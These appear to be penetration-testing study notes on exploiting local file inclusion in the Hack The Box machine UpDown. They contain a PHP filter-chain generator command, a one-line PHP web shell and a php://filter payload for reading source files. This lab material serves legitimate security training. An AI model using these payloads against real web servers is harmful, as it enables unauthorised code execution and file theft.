// notes/ Web Exploitation
🕸️
Source Code
<figure<img src="/files/7I5gAlxQJnFBMXWN2TRT" alt=""<figcaption</figcaption</figure
#web applications#adot8
source · oscp.adot8.com · web-applications/source-code ↗Source Code
LFI
UpDown HTB
<figure><img src="/files/7I5gAlxQJnFBMXWN2TRT" alt=""><figcaption></figcaption></figure>- Direct Access set to false
- Get the page
- If the page doesn't have /bin, usr, home, var, etc
- Then it does an include on the page variable and appends .php (on any file)
- Else, it includes checker.php
RCE via PHP filters
It's possible to get command execution just through $_GET['page']
{% embed url="https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters" %}
code
01python3 php_filter_chain_generator.py --chain "<?php phpinfo(); ?>"Take the output and append it to /?page=
<figure><img src="/files/A3t60cbELOkPngGFBLbA" alt=""><figcaption></figcaption></figure>If system isn't a disabled function this can be used
code
01<?php system($_GET["cmd"]); ?>{% embed url="https://github.com/RoqueNight/LFI---RCE-Cheat-Sheet" %}
Reading Local Files
We can pull the index.php file encoded in base64 using this wrapper in the GET request
code
01/?page=php://filter/convert.base64-encode/resource=indexGood example:
{% embed url="https://htb.adot8.com/hack-the-box/oscp-like-boxes/updown/foothold" %}